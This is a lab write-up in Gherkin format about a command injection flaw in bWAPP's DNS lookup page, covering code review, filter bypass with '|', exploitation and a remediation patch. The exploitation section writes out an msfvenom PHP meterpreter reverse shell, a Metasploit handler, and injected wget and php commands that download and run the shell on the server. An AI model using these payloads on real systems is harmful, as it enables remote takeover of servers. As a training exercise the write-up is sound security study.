## Version 1.4.1
## language: en

Feature:
  TOE:
    bWAPP
  Category:
    Injection
  Location:
    http://192.168.0.76/bWAPP/commandi.php - target (field)
  CWE:
    CWE-77: Improper Neutralization of Special Elements used in a Command
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Upload a shell using command injection
  Recommendation:
    Filter user input

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali linux      | 2019.1      |
    | Mozilla Firefox | 60.4.0      |
  TOE information:
    Given I am running bWAPP on a beebox VM via VirtualBox on http://bWAPP
    And The url is "http://bWAPP/commandi.php"
    And I access the application with my broswer
    And I set the level on medium

  Scenario: Normal use case
  DNS lookup
    Given The application runs DNS lookup
    And has a text field with the following information
    """
    www.nsa.gov
    """
    When I press the "Dnslookup" button
    Then I get the IP from the site

  Scenario: Static detection
  The user input doesn't filter bad character
    When I look at the code commandi.php and functions_external.php
    """
    125 if(isset($_POST["target"]))
    126 {
    127    $target = $_POST["target"];
    138    if($target == "")
    129    {
    130        echo "<font color=\"red\">Enter a domain name...</font>";
    131     }
    132    else
    133    {
    134        echo "<p align=\"left\">" . shell_exec
    135               ("nslookup  " . commandi($target)) . "</p>";
    136    }
    137 }
    """
    Then I see that application is using a function shell_exec()
    And I see that application is using the user input
    Then I see the following validation
    """
    179 $input = str_replace("&", "", $data);
    180 $input = str_replace(";", "", $input);
    181 return $input;
    """
    And I noticed that the character "|" isn't being validated
    Then I can conclude that application is vulnerable to command injection

  Scenario: Dynamic detection
  Verify if the web server allows special characters
    When I see a text field to send data
    Then I send the following characters
    """
    ; & |
    """
    And I can see that application filtered some characters
    """
    ; &
    """
    When I try to send a command using the following payload
    """
    www.nsa.gov | ls
    """
    Then I can see the files from the directory
    Then I conclude that it is possible a command injection

  Scenario: Exploitation
  Upload a shell using command injection
    Given That I can execute commands using "|"
    And My machine's local IP
    """
    192.168.0.22
    """
    And I use msfvenom to generate a script from the shell
    """
    $ msfvenom -p php/meterpreter/reverse_tcp
    -f raw lhost=192.168.0.22 lport=4050
    > /var/www/html/shell.txt
    """
    Then I start the service apache2
    And I use a handler from metasploit
    Then I configure the following parameters
    """
    msf5 > use multi/handler
    msf5  exploit(handler) > set payload php/meterpreter/reverse_tcp
    msf5  exploit(handler) > set lhost 192.168.0.22
    msf5  exploit(handler) > set lport 4050
    msf5  exploit(handler) > run
    """
    Then I use the character "|" to execute commands
    And I use wget to download the shell.txt file into the victim server
    """
    www.nsa.gov | wget http://192.0.1.22/shell.txt
    -O /var/www/bWAPP/shell.php
    """
    Then I look for the file shell.php into victim server
    """
    www.nsa.gov | ls
    """
    And I execute the script
    """
    www.nsa.gov | php shell.php
    """
    And I can see that connection is on
    And I use the following command in the msfconsole
    """
    sysinfo
    """
    Then I get a connection

  Scenario: Remediation
  Sanitizing input
    Given I have patched the code by doing a validation
    """
    179 $input = str_replace("&", "", $data);
    180 $input = str_replace(";", "", $input);
    181 $input = str_replace("|", "", $input);
    182 return $input;
    """
    When I go to "http://192.168.0.76/bWAPP/commandi.php"
    And I try to run the following command
    """
    $ | cat robots.txt
    """
    Then I can't get any data
    Then I confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.3/10 (High) - AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.9/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.1/10 (Medium) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2019-07-22
